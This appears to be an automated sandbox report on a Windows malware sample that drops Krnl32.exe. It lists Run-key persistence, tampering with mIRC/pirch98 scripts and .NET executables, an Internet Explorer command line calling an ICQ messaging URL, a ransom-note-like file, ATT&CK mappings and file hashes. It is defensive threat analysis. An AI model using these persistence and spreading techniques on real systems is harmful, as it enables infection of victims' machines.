272b3b434db2ba30b84a82b449118df53a1cbecfe56f7d8fde85217832ca7dea

Analysis

max time kernel
141s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
23-05-2024 02:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe
Size

26KB
MD5

7841679a708383a6506f889f6acc6560
SHA1

5fd0854563ff26d8772350d21e23d2bd0e3ce8dd
SHA256

272b3b434db2ba30b84a82b449118df53a1cbecfe56f7d8fde85217832ca7dea
SHA512

65ace7ac401c60ecb6d0d1bd160a0e7c6e47d741a90ef118dba56d852cf76721eabeeb2322684df376699b6be87be52f3950d34805fa840a72bd26bdb74067ef
SSDEEP

768:qq3G3q83wdv7GLGS1R9TNoINEx9jnhwrg:Jkq83wdv7Gt+

Score

7^/10

persistence

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

Krnl32.exe

pid process

2484 Krnl32.exe
Loads dropped DLL 2 IoCs

Processes:

7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe

pid process

2292 7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe
2292 7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe

pid	process
2484	Krnl32.exe

pid	process
2292	7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe
2292	7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

7841679a708383a6506f889f6acc6560_NeikiAnalytics.exeKrnl32.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WinKernel = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe"	7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WinKernel = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Krnl32.exe"	Krnl32.exe

Drops file in Program Files directory 4 IoCs

Processes:

Krnl32.exe

description	ioc	process
File opened for modification	C:\Program Files\mirc\script.ini	Krnl32.exe
File opened for modification	C:\Program Files\mirc\ \.dcc send $nick	Krnl32.exe
File opened for modification	C:\Program Files\pirch98\pirch98.ini	Krnl32.exe
File opened for modification	C:\Program Files\pirch98\events.ini	Krnl32.exe

Drops file in Windows directory 64 IoCs

Processes:

Krnl32.exe

description	ioc	process
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v3.0\WPF\XamlViewer\XamlViewer_v0300.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\ComSvcConfig.exe	Krnl32.exe
File opened for modification	C:\Windows\ehome\ehrec.exe	Krnl32.exe
File created	C:\Windows\hh.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Workflow.Compiler.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\AppLaunch.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v3.5\AddInProcess.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe	Krnl32.exe
File opened for modification	C:\Windows\bfsvc.exe	Krnl32.exe
File opened for modification	C:\Windows\ehome\Mcx2Prov.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe	Krnl32.exe
File opened for modification	C:\Windows\ehome\wow\ehexthost32.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMConfigInstaller.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess32.exe	Krnl32.exe
File created	C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe	Krnl32.exe
File opened for modification	C:\Windows\hh.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CasPol.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Krnl32.exe
File opened for modification	C:\Windows\ehome\MediaCenterWebLauncher.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regbrowsers.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regiis.exe	Krnl32.exe
File opened for modification	C:\Windows\fveupdate.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v3.5\AddInProcess32.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Krnl32.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\MSBuild.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\ServiceModelReg.exe	Krnl32.exe
File opened for modification	C:\Windows\ehome\mcupdate.exe	Krnl32.exe
File opened for modification	C:\Windows\ehome\WTVConverter.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v3.5\AddInUtil.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe	Krnl32.exe
File opened for modification	C:\Windows\ehome\ehprivjob.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regsql.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_compiler.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\MSBuild.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_wp.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v3.5\EdmGen.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Krnl32.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe	Krnl32.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v3.5\AddInUtil.exe	Krnl32.exe
File opened for modification	C:\Windows\ehome\CreateDisc\SBEServer.exe	Krnl32.exe
File opened for modification	C:\Windows\ehome\ehrecvr.exe	Krnl32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

Iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\GPU	Iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20160348b9acda01	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\InternetRegistry	Iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	Iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	Iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes	Iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	Iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "422593306"	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\IntelliForms	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Zoom	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar	Iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	Iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000af84b4028a6c28439aeaa6cbb96c113300000000020000000000106600000001000020000000d469ceef3391750b6c89bcdf11fd5249415ba1376a2afefe3f1a5a985ce10b8e000000000e80000000020000200000009cc0972c9862f9660f3549d290ad187d82e6420376ff8a60ce9b4c0e704c06f820000000288d335c5312009a1f1b066b613936d50b71328c1a95d669d200e0ca937ffb66400000006ee6cf1e0caddd6229c4fb899e21552d4cebf2550e2d5a6deb365d291fd740e6f80c4a49ea2de9dd4613f93a40a1d3fc0f041d5011c9cb384bb221f16d385210	Iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000af84b4028a6c28439aeaa6cbb96c1133000000000200000000001066000000010000200000001abccbaf58caf0f5bccf7affe6fce4f30e7a08db19df01eca9ce42b778b12027000000000e80000000020000200000009c3d46f453b0ccb8a70c00e6698789d26d2018614c23d0f33c1dc24e2f96fc7090000000ab2ed2b409e7a106432a7745db615a4a0e35e55b591f0edef68c071dc5fd1efb67a43b19adbe6dfb3e30bd0c6c9de597a6fc7474b3fe0be60785a1f606be5f1d77dced91fd34ab85d7473db665ddade1120b03b9ed122b458985b5aceb0c945a735a16a76f914caab1b0c47edc95a95a73d9c0ff11c285e261a983f218710d5b550548dbcbe61e2e30ef58e5f6d22f4640000000b2a4b5a6d2951274f9fa4e10d7bbac7dfbb9ef75dbc77f087a4750e66945a6b52e606b0618ff8ce5530fe5ca339e404a8409b759601514e9670dcf70fe173dba	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\PageSetup	Iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	Iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{714612D1-18AC-11EF-995F-5A791E92BC44} = "0"	Iexplore.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

2780 NOTEPAD.EXE
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Iexplore.exe

pid process

2504 Iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

Iexplore.exeIEXPLORE.EXE

pid process

2504 Iexplore.exe
2504 Iexplore.exe
2112 IEXPLORE.EXE
2112 IEXPLORE.EXE
2112 IEXPLORE.EXE
2112 IEXPLORE.EXE

pid	process
2780	NOTEPAD.EXE

pid	process
2504	Iexplore.exe

pid	process
2504	Iexplore.exe
2504	Iexplore.exe
2112	IEXPLORE.EXE
2112	IEXPLORE.EXE
2112	IEXPLORE.EXE
2112	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

7841679a708383a6506f889f6acc6560_NeikiAnalytics.exeKrnl32.exeIexplore.exe

description	pid	process	target process
PID 2292 wrote to memory of 2484	2292	7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe	Krnl32.exe
PID 2292 wrote to memory of 2484	2292	7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe	Krnl32.exe
PID 2292 wrote to memory of 2484	2292	7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe	Krnl32.exe
PID 2292 wrote to memory of 2484	2292	7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe	Krnl32.exe
PID 2292 wrote to memory of 2780	2292	7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe	NOTEPAD.EXE
PID 2292 wrote to memory of 2780	2292	7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe	NOTEPAD.EXE
PID 2292 wrote to memory of 2780	2292	7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe	NOTEPAD.EXE
PID 2292 wrote to memory of 2780	2292	7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe	NOTEPAD.EXE
PID 2484 wrote to memory of 2504	2484	Krnl32.exe	Iexplore.exe
PID 2484 wrote to memory of 2504	2484	Krnl32.exe	Iexplore.exe
PID 2484 wrote to memory of 2504	2484	Krnl32.exe	Iexplore.exe
PID 2484 wrote to memory of 2504	2484	Krnl32.exe	Iexplore.exe
PID 2504 wrote to memory of 2112	2504	Iexplore.exe	IEXPLORE.EXE
PID 2504 wrote to memory of 2112	2504	Iexplore.exe	IEXPLORE.EXE
PID 2504 wrote to memory of 2112	2504	Iexplore.exe	IEXPLORE.EXE
PID 2504 wrote to memory of 2112	2504	Iexplore.exe	IEXPLORE.EXE

C:\Users\Admin\AppData\Local\Temp\7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2292

C:\Users\Admin\AppData\Local\Temp\Krnl32.exe
"C:\Users\Admin\AppData\Local\Temp\Krnl32.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2484

C:\Program Files\Internet Explorer\Iexplore.exe
"C:\Program Files\Internet Explorer\Iexplore.exe" http://wwp.icq.com/scripts/WWPMsg.dll?from=M4TrIx&fromemail=_&subject=MATRIX&body=THE%20MATRIX%20HAS%20COME...&to=90012644%20HTTP/1.0
3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2504

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2504 CREDAT:275457 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2112

C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\HELPME.TXT
2⤵
- Opens file in notepad (likely ransom note)
PID:2780

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
Filesize
252B

MD5
a5b4da39c8bf72531d07297135370b54

SHA1
d3ce46eb54497b60ac86227495da28c66f675a37

SHA256
185e5a436bf54094bcec46d947c9454f42ea57d0c2c904dbb335acab00aef238

SHA512
62482c6aa16bfd85a4f23e5552f226b36b7dcf6137d2e3e61e5dac1be3f75c72d1612816ee6e6665a49d7e554460cf516d4f8494411972ca960bc847a95f3bbe

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
4c72f2f716bee56ef178f86d8199fde0

SHA1
6e255b455361a0f66f2469a6dea8aa9d8bb6a8cf

SHA256
010f68fdd576d08936924107d7887b04620e589520bdc35e1d6e9bbd56b3d189

SHA512
e6cd500cbe9813a8ad415018fc07223e39d4bf92544a19f20a476a762ad785ee077cd365264f007d804a62c3c6b95ef7a1f18bae44315227b147cddf66910a20

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
978189ec1db792397df84a793c3a9a5e

SHA1
3d8b75fa98bdb75c5166fca188af34897f8d0b4c

SHA256
56b4d0bef9d57b2700081fe3b2c24499df1bccf5049b3f0cbbf9642e4a698db9

SHA512
f2ce248f6deb809332f39bbc3cc80e0d119da340259271a7c58c63bd0cba20dd077b2df756887d9f9f951861563cd8149d1832000687fe10066e830661520ae0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
4f70aabdc7448387266f82be23324d1d

SHA1
00cbe2638f2ceb404c0906493d605729b7daa232

SHA256
c4190143e35f0494c3a24bae6f9a4625cb459e0b1888612661c4ea1bb455f739

SHA512
f0c4c6cc656f7c5c4a221615db889c891f3a057ecb0501dfcd576b47ac38381f297d8e971ba9e9f289a82a270c11d9cc97d1277c94d705c594dfc1a59f5aa949

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
5882c29a0998e7b5f8990e2c74361dc0

SHA1
770449fafe617aea3f7aeb25ed5378dd06efeab3

SHA256
47710065ad956e8d7933b09e2c6ace8f3e9d50c998a761bd57d5c09405318280

SHA512
914edb02bada5568989fb45feffb58b50ae5b506aa5ce5dcd9e4b3626a5d357e255a672bac6050d2820b37ee18ff5897586037549468a77617818613264a0880

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
38af68b07674c670069706a2d2fefa72

SHA1
20210040a0056e9d05cbd4d4fa144f2c2c0f1f4e

SHA256
a213fd20954f08179b06c62a0c5540086de9f03fbcbc5734f9c61fd614e25c19

SHA512
bf2e12aaa0ad9e893f300da69ab3435d08f5309e1d7cdafdb4a5f59f35baf99e0b4ba552812a77546264607f54dc58cdf5e52478d9909638ddf00b988e395734

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
d10231397aa0fcd96b0d816d8cc799eb

SHA1
0332972f5f270bda69847ecfeba4c736b9489571

SHA256
6893c2b30838b278cae6b3949cf6e225f8a34fae6bc17d1d7233f142dfe30eb9

SHA512
583dd1986ffd4af8d254f8a46167262a40c39f0eb728642e07f664ce2c7a81ac3bdf901229e7f4b8b4d652be0eb8ea3f255de5486cc11bc3bdb283b38b26b4a9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
155ceda4d4d0e0261a1dddd34012c26f

SHA1
9bea9c3958c995f3443e87549895010690ac5ea0

SHA256
fa5b4f8b1db52473908de3a6aaed6b59e7e6d6e1d750f7b03b1b2455f3a7d42c

SHA512
82ab52db8e5a95aacdd9f6c7cc5f50d4edfae184f42bb76eef9923a95dc6b4d5868e15bf9814aa1a47c3a22f8b37ed20befc214eaf24d3a1bf4722396fa55d6b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
31c72320646f08f10165f8cfd2c4bb54

SHA1
a4c87f45a70f86157fd1d1e92a4c4d6716452837

SHA256
e150112b75f5ffb84794beb270c163a0f9f54fb86da98a9b90412198ab13feb2

SHA512
c746599b9da3d443681b462911d7f55fb3b1c7453d509c44b3712ee8323b376abdec522066cdf8018c6d5d2bdf9827f248104b10b89f4ccbde932f9b952d6d9d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
accd05d58b4a6b4f22363a87dd7b4c2b

SHA1
d439ea4c18ad09faa42626f637c74bccee40194a

SHA256
f9aa7922ce45cd6a59016cb0bb39117f345a8b34cc8e2b19eb7b618185907cfa

SHA512
46354aaf7f63fb00332d10e168e4fd92886dfb3e79a93f7d661c9aeefa6ce03b3a7387ee92d0b94b311917df95609ec464cf57d0381f59b0ff7839c71b95590e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
7b0e27a575b9e335eea76a66bcc19dbd

SHA1
398c8802eb862c1ab5905942e342be57f38185d9

SHA256
cd3846554dfc931fb664b40c0d7d16b8fe086fe679274daebaaba9a9789cb8f5

SHA512
56324e45f021b80324dbca12fc4480416488b47412a97f7bb54e770fd34494e1d57465997947c019e06a04835bfa930168785e0fa09902e61d8487e0057d8f74

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
cd409fb0b32e17f879552351546a8f51

SHA1
fc91bd94e240c70cb36007d9ad0498efb8278e9a

SHA256
96b593b20f2f4de5484c2e69ee16c2f817c5412c620317b0a46d46404dcc20ca

SHA512
f4e174e67b88d257f7d2d8ec7c23c7db527c4349d11f1d1549a720aa8815a291bdb46a94e869c86bc4b0708d1ca26b35415dab2f3da01c4d261dd5b63a4b1f8d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
